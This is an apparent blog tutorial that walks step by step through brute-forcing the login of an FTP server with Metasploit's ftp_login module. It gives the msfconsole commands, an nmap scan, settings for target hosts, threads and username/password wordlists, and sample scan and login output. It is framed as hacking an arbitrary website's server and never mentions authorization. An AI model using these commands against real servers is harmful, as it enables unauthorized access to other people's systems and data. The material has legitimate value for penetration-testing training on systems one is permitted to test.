Recents in Beach

header ads

How To Hack FTP Server Using Metasploit

How To Hack FTP Server Using Metasploit

How To Hack FTP Server Using Metasploit
How To Hack FTP Server Using Metasploit

Hack Ftp server using Metasploit in kali Linux

On most servers, there is a common vulnerability that is an open FTP port.It can be exploited by brute forcing its username and password.This is exactly what we are going to do.We will exploit a web server with an open FTP port.There are the couple of things you need to do this:
the first thing you need is Msfconsole, of course of course installed in Kali..Second thing you need is two wordlists.If you already have then it's good else you can create your own wordlist. So create 2 wordlists of usernames and passwords.Once you have it then we are good to go.
So open your terminal and start PostgreSQL database:
root@seven:~# service postgresql start

Start Metasploit:

root@seven:~# msfconsole
The first thing we need is to find IP address of your target and an open FTP port as well.So we will run a fast nmap scan to grab the both. You can run your nmap commands inside Msfconsole console so don't bother to open another terminal for nmap scan. Type the following command:
msf > nmap -F
[*] exec: nmap -F
Starting Nmap 6.49BETA4 ( ) at 
Nmap scan report for (
Host is up (0.43s latency).
rDNS record for ip-192-186-251-160
Not shown: 88 filtered ports
21/tcp   open  ftp
22/tcp   open  ssh
Now we have our target.We need to find our exploit.For this attack, we will use the ftp_login exploit.So type the following command to search the exploit:
msf > search ftp_login
Matching Modules

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   auxiliary/scanner/ftp/ftp_login                   normal  FTP Authentication Scanner

msf > 
Above command will bring up FTP authentication scanner.We are going to use it.
Find out more information about ftp_login scanner with the below will bring up the usage, description and the options that you can use with this exploit.There are plenty but we hardly need 4 may be 6 options just go through all to find more information.
msf > info auxiliary/scanner/ftp/ftp_login 

Use ftp_login exploit

Just write the below command to use exploit:
msf > use  auxiliary/scanner/ftp/ftp_login
Once you are inside ftp_login exploit type the below command to see how to set target.It might confuse you because there are a lot of options.We just need to use 4 of them.
msf auxiliary(ftp_login) > show options

Set your Target

now we need to set the option RHOST by giving IP address of your target.Just give the IP address of the website.
msf auxiliary(ftp_login) > set RHOSTS
remote host
Set threads it sets the speed or how much multiple processes you want to run at a time.

Also Check: Beginners Ethical Hacking Course
msf auxiliary(ftp_login) > set THREADS 40
set threads
Now here starts the real work.
Set the path of file usernames.This is where exploit will grab usernames to log in.Give the right path in my case my wordlist is on the desktop.
msf auxiliary(ftp_login) > set USER_FILE Desktop/usernames.txt
Now set the path of passwords list.

Also Check: Beginners Ethical Hacking Course
msf auxiliary(ftp_login) > set PASS_FILE Desktop/password.txt
Now everything is set.Run the exploit.Now it starts testing usernames and passwords if it finds username and password then it will stop testing and it displays the login successful message along with username and password.
msf auxiliary(ftp_login) > exploit
msf auxiliary(ftp_login) > exploit
[*] - Starting FTP login sweep
[-] FTP - LOGIN FAILED: admin:adminarea (Incorrect: )
Another thing you can do is to use a single username.So instead of using a wordlist, you can use some common usernames like root, admin etc.So it will take root as the username and will search for passwords from the wordlists.
msf auxiliary(ftp_login) > set USERNAME root
So above are the How To Hack FTP Server Using Metasploit. Hope you like this article, keep on sharing with others too. Also, share your experience with us in a comment box below.

Post a Comment